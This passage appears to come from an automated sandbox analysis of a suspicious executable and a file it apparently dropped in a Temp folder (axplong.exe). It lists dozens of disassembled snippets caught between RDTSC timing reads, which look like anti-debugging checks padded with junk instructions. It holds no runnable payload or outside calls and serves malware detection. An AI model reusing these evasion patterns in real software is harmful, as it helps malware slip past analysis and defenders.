                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FC1382 second address: FC138D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 push esi 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FC138D second address: FC139E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 jg 00007FD4A4C546AFh 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FC139E second address: FC13C1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD4A4ED8673h 0x00000009 pushad 0x0000000a pushad 0x0000000b popad 0x0000000c push esi 0x0000000d pop esi 0x0000000e jns 00007FD4A4ED8666h 0x00000014 popad 0x00000015 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FC49D3 second address: FC49EE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 js 00007FD4A4C54696h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jmp 00007FD4A4C5469Fh 0x00000011 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FD1967 second address: FD19B1 instructions: 0x00000000 rdtsc 0x00000002 ja 00007FD4A4ED866Eh 0x00000008 pushad 0x00000009 popad 0x0000000a jng 00007FD4A4ED8666h 0x00000010 pop edx 0x00000011 pop eax 0x00000012 pushad 0x00000013 jp 00007FD4A4ED867Dh 0x00000019 push eax 0x0000001a push edx 0x0000001b pushad 0x0000001c popad 0x0000001d jmp 00007FD4A4ED8676h 0x00000022 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FE1313 second address: FE1317 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FE117A second address: FE1184 instructions: 0x00000000 rdtsc 0x00000002 ja 00007FD4A4ED8666h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FE2DCE second address: FE2DF9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007FD4A4C546A5h 0x0000000a jmp 00007FD4A4C5469Ch 0x0000000f pushad 0x00000010 pushad 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FFFFC6 second address: FFFFCA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FFFFCA second address: FFFFD3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FFEF6C second address: FFEF8F instructions: 0x00000000 rdtsc 0x00000002 jo 00007FD4A4ED8666h 0x00000008 jmp 00007FD4A4ED866Fh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f je 00007FD4A4ED866Eh 0x00000015 pushad 0x00000016 popad 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FFEF8F second address: FFEFB1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FD4A4C546A8h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FFEFB1 second address: FFEFB5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FFEFB5 second address: FFEFBB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FFEFBB second address: FFEFC5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FFF3C9 second address: FFF3F2 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push esi 0x00000004 pop esi 0x00000005 pushad 0x00000006 popad 0x00000007 pop ecx 0x00000008 jmp 00007FD4A4C546A6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f je 00007FD4A4C546BAh 0x00000015 push edi 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FFF3F2 second address: FFF40B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 jmp 00007FD4A4ED8670h 0x0000000e rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FFFC6E second address: FFFC78 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FD4A4C54696h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FFFC78 second address: FFFC87 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 jnp 00007FD4A4ED8666h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FFFC87 second address: FFFCA6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 jo 00007FD4A4C546A7h 0x0000000e jmp 00007FD4A4C546A1h 0x00000013 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1001756 second address: 100176E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007FD4A4ED8672h 0x0000000b rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 100176E second address: 1001772 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 100417B second address: 1004180 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1004180 second address: 1004186 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1004186 second address: 100418A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 100723F second address: 1007245 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1007245 second address: 100724B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 100724B second address: 100724F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 100724F second address: 1007277 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007FD4A4ED866Eh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push edx 0x00000010 ja 00007FD4A4ED8668h 0x00000016 pushad 0x00000017 pushad 0x00000018 popad 0x00000019 pushad 0x0000001a popad 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C80CBF second address: 4C80CC5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C80CC5 second address: 4C80CC9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C80CC9 second address: 4C80CD7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C80CD7 second address: 4C80CDF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 movzx ecx, di 0x00000007 popad 0x00000008 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C80CDF second address: 4C80CE5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C80CE5 second address: 4C80D25 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a jmp 00007FD4A4ED8674h 0x0000000f pop ebp 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 pushfd 0x00000014 jmp 00007FD4A4ED866Dh 0x00000019 jmp 00007FD4A4ED866Bh 0x0000001e popfd 0x0000001f mov dx, si 0x00000022 popad 0x00000023 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C80D25 second address: 4C80D2B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C500D0 second address: 4C500D6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C500D6 second address: 4C500F6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FD4A4C546A5h 0x00000010 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C500F6 second address: 4C50127 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD4A4ED8671h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007FD4A4ED8671h 0x0000000f xchg eax, ebp 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 mov cl, bh 0x00000015 mov bx, ax 0x00000018 popad 0x00000019 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C50127 second address: 4C50159 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FD4A4C546A7h 0x00000008 mov dx, ax 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e mov ebp, esp 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007FD4A4C5469Ch 0x00000019 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C50159 second address: 4C5015F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C5015F second address: 4C50195 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movzx esi, bx 0x00000006 mov edx, 3D03BCACh 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push dword ptr [ebp+04h] 0x00000011 jmp 00007FD4A4C5469Bh 0x00000016 push dword ptr [ebp+0Ch] 0x00000019 pushad 0x0000001a call 00007FD4A4C546A4h 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C501EB second address: 4C501EF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C501EF second address: 4C501F5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C709FF second address: 4C70A03 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C70A03 second address: 4C70A09 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C70A09 second address: 4C70A59 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD4A4ED8670h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d call 00007FD4A4ED866Dh 0x00000012 pop ecx 0x00000013 pushfd 0x00000014 jmp 00007FD4A4ED8671h 0x00000019 add si, 28D6h 0x0000001e jmp 00007FD4A4ED8671h 0x00000023 popfd 0x00000024 popad 0x00000025 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C70A59 second address: 4C70AA5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD4A4C546A1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b mov ax, di 0x0000000e movsx edi, cx 0x00000011 popad 0x00000012 xchg eax, ebp 0x00000013 jmp 00007FD4A4C546A2h 0x00000018 mov ebp, esp 0x0000001a push eax 0x0000001b push edx 0x0000001c jmp 00007FD4A4C546A7h 0x00000021 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C70AA5 second address: 4C70ABD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FD4A4ED8674h 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C70ABD second address: 4C70AE6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD4A4C5469Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FD4A4C546A5h 0x00000013 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C705D3 second address: 4C7062C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FD4A4ED866Fh 0x00000009 sbb cx, A8CEh 0x0000000e jmp 00007FD4A4ED8679h 0x00000013 popfd 0x00000014 movzx eax, di 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a xchg eax, ebp 0x0000001b pushad 0x0000001c movsx ebx, cx 0x0000001f mov cx, 8BE1h 0x00000023 popad 0x00000024 mov ebp, esp 0x00000026 push eax 0x00000027 push edx 0x00000028 jmp 00007FD4A4ED8673h 0x0000002d rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C7062C second address: 4C70681 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FD4A4C5469Fh 0x00000008 mov dx, ax 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pop ebp 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 mov dx, ECA2h 0x00000016 pushfd 0x00000017 jmp 00007FD4A4C546A3h 0x0000001c adc ecx, 7B59B19Eh 0x00000022 jmp 00007FD4A4C546A9h 0x00000027 popfd 0x00000028 popad 0x00000029 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C70681 second address: 4C70687 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C70687 second address: 4C7068B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C70325 second address: 4C7034A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov di, si 0x00000006 mov di, si 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007FD4A4ED8676h 0x00000014 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C7034A second address: 4C7036D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FD4A4C546A1h 0x00000009 jmp 00007FD4A4C5469Bh 0x0000000e popfd 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C7036D second address: 4C703A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 xchg eax, ebp 0x00000008 jmp 00007FD4A4ED8674h 0x0000000d mov ebp, esp 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007FD4A4ED8677h 0x00000016 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C703A4 second address: 4C703D1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD4A4C546A9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FD4A4C5469Dh 0x00000011 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C80029 second address: 4C800A7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD4A4ED8671h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b pushfd 0x0000000c jmp 00007FD4A4ED8677h 0x00000011 and al, FFFFFF8Eh 0x00000014 jmp 00007FD4A4ED8679h 0x00000019 popfd 0x0000001a mov ebx, eax 0x0000001c popad 0x0000001d xchg eax, ebp 0x0000001e pushad 0x0000001f mov ax, 018Fh 0x00000023 mov dh, ah 0x00000025 popad 0x00000026 mov ebp, esp 0x00000028 pushad 0x00000029 mov ax, di 0x0000002c mov ah, bh 0x0000002e popad 0x0000002f pop ebp 0x00000030 push eax 0x00000031 push edx 0x00000032 pushad 0x00000033 jmp 00007FD4A4ED8678h 0x00000038 popad 0x00000039 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C800A7 second address: 4C800AE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov eax, ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C900A8 second address: 4C900ED instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD4A4ED866Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [ebp+08h] 0x0000000c jmp 00007FD4A4ED8670h 0x00000011 and dword ptr [eax], 00000000h 0x00000014 pushad 0x00000015 pushad 0x00000016 mov di, ax 0x00000019 popad 0x0000001a mov di, E98Ah 0x0000001e popad 0x0000001f and dword ptr [eax+04h], 00000000h 0x00000023 push eax 0x00000024 push edx 0x00000025 jmp 00007FD4A4ED866Ch 0x0000002a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CD0347 second address: 4CD039B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FD4A4C546A1h 0x00000008 pushfd 0x00000009 jmp 00007FD4A4C546A0h 0x0000000e jmp 00007FD4A4C546A5h 0x00000013 popfd 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 xor dword ptr [esp], 3CEC978Bh 0x0000001e push eax 0x0000001f push edx 0x00000020 jmp 00007FD4A4C5469Dh 0x00000025 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CD03C2 second address: 4CD03DB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movzx eax, di 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b movzx eax, al 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 mov eax, 590EB8E7h 0x00000016 pushad 0x00000017 popad 0x00000018 popad 0x00000019 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CD03DB second address: 4CD03E1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CD03E1 second address: 4CD040C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD4A4ED8675h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FD4A4ED866Dh 0x00000013 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F1C974 second address: F1C998 instructions: 0x00000000 rdtsc 0x00000002 jns 00007FD4A4C546A9h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push ecx 0x0000000e push ebx 0x0000000f pop ebx 0x00000010 pop ecx 0x00000011 rdtsc
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeRDTSC instruction interceptor: First address: 95F2E3 second address: 95F2E7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeRDTSC instruction interceptor: First address: AE9C3E second address: AE9C44 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeRDTSC instruction interceptor: First address: AE8FA4 second address: AE8FAA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeRDTSC instruction interceptor: First address: AE8FAA second address: AE8FB4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push edi 0x00000009 pop edi 0x0000000a rdtsc
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeRDTSC instruction interceptor: First address: AE8FB4 second address: AE8FB8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeRDTSC instruction interceptor: First address: AE910E second address: AE9112 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeRDTSC instruction interceptor: First address: AE956F second address: AE957D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 jne 00007FD4A4ED8666h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeRDTSC instruction interceptor: First address: AEAE9F second address: AEAEA5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeRDTSC instruction interceptor: First address: AEAEA5 second address: AEAEE3 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [esp+04h] 0x0000000c push esi 0x0000000d pushad 0x0000000e push esi 0x0000000f pop esi 0x00000010 pushad 0x00000011 popad 0x00000012 popad 0x00000013 pop esi 0x00000014 mov eax, dword ptr [eax] 0x00000016 push eax 0x00000017 jmp 00007FD4A4ED8674h 0x0000001c pop eax 0x0000001d mov dword ptr [esp+04h], eax 0x00000021 push eax 0x00000022 push edx 0x00000023 jmp 00007FD4A4ED866Ch 0x00000028 rdtsc
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeRDTSC instruction interceptor: First address: AEAEE3 second address: AEAEF7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FD4A4C546A0h 0x00000009 rdtsc
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeRDTSC instruction interceptor: First address: AEAF4E second address: AEAFCB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD4A4ED8670h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c push 00000000h 0x0000000e push edx 0x0000000f call 00007FD4A4ED8668h 0x00000014 pop edx 0x00000015 mov dword ptr [esp+04h], edx 0x00000019 add dword ptr [esp+04h], 00000016h 0x00000021 inc edx 0x00000022 push edx 0x00000023 ret 0x00000024 pop edx 0x00000025 ret 0x00000026 push 00000000h 0x00000028 jmp 00007FD4A4ED8677h 0x0000002d call 00007FD4A4ED8669h 0x00000032 jnc 00007FD4A4ED8678h 0x00000038 push eax 0x00000039 push eax 0x0000003a push edx 0x0000003b jmp 00007FD4A4ED866Bh 0x00000040 rdtsc
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeRDTSC instruction interceptor: First address: AEAFCB second address: AEAFD1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeRDTSC instruction interceptor: First address: AEAFD1 second address: AEAFFC instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [esp+04h] 0x0000000c pushad 0x0000000d pushad 0x0000000e push edi 0x0000000f pop edi 0x00000010 push ebx 0x00000011 pop ebx 0x00000012 popad 0x00000013 jmp 00007FD4A4ED866Eh 0x00000018 popad 0x00000019 mov eax, dword ptr [eax] 0x0000001b push eax 0x0000001c push edx 0x0000001d pushad 0x0000001e pushad 0x0000001f popad 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeRDTSC instruction interceptor: First address: AEAFFC second address: AEB001 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
